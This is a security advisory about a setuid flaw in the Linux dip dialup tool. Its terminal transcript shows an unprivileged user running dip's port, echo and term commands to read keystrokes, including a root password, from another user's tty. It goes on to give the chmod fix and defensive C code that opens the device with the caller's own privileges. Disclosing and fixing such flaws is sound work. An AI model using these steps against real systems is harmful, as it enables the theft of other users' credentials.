COMMAND

    /usr/sbin/dip

SYSTEMS AFFECTED

    Linux

PROBLEM

    George Staikos found yet another DIP exploit. It appears to allow
    any user to gain control of arbitrary devices in /dev. For
    instance, George has successfully stolen keystrokes from a root
    login as follows (he could also dump characters to the root
    console):

	$ whoami
	cesaro
	$ cat < /dev/tty1                    <------ root login here
	bash: /dev/tty1: Permission denied   <------ nope, we can't see it

	$ dip -t
	DIP: Dialup IP Protocol Driver version 3.3.7o-uri (8 Feb 96)
	Written by Fred N. van Kempen, MicroWalt Corporation.

	DIP> port tty1
	DIP> echo on
	DIP> term
	[ Entering TERMINAL mode.  Use CTRL-] to get back ]
	roots_password                       <------ OH, maybe we *CAN* see it!
	[ Back to LOCAL mode. ]
	DIP> quit
	$

    There are many more creative things to do with this.

SOLUTION

    As usual in these cases, the recommendation is:

	chmod u-s /usr/sbin/dip
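
    For maintainers of setuid tools that open a device on a user's
    behalf, the sketch below shows the check whose absence the
    transcript above demonstrates. It is an added example, not dip's
    source and not part of the original advisory. It assumes the
    binary opens the named port with its setuid effective uid;
    port_name_ok and open_port_as_caller are hypothetical names.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Accept only a bare device name such as "tty1" (no path components). */
int port_name_ok(const char *name)
{
    if (name == NULL || *name == '\0' || strlen(name) > 32)
        return 0;
    return strchr(name, '/') == NULL &&
           strcmp(name, ".") != 0 && strcmp(name, "..") != 0;
}

/* Hypothetical helper: open /dev/<name> with the caller's real uid rather
 * than the setuid effective uid. Returns an fd, or -1 with errno set. */
int open_port_as_caller(const char *name)
{
    char path[64];
    uid_t saved_euid = geteuid();
    int fd, saved_errno;
    if (!port_name_ok(name)) { errno = EINVAL; return -1; }
    snprintf(path, sizeof path, "/dev/%s", name);

    /* Drop to the invoking user so the kernel checks that user's
     * permissions on the device node, as it did for "cat" above. */
    if (seteuid(getuid()) != 0)
        return -1;
    fd = open(path, O_RDWR | O_NOCTTY | O_NONBLOCK);
    saved_errno = errno;

    /* Restore the effective uid; fail closed if that is not possible. */
    if (seteuid(saved_euid) != 0) {
        if (fd >= 0) close(fd);
        return -1;
    }
    errno = saved_errno;
    return fd;
}

int main(int argc, char **argv)
{
    int fd = open_port_as_caller(argc > 1 ? argv[1] : "tty1");
    if (fd < 0) { perror("open_port_as_caller"); return 1; }
    close(fd);
    return 0;
}
```

    Built setuid root and run by an ordinary user against another
    user's tty, this fails with the same "Permission denied" that
    cat reported above.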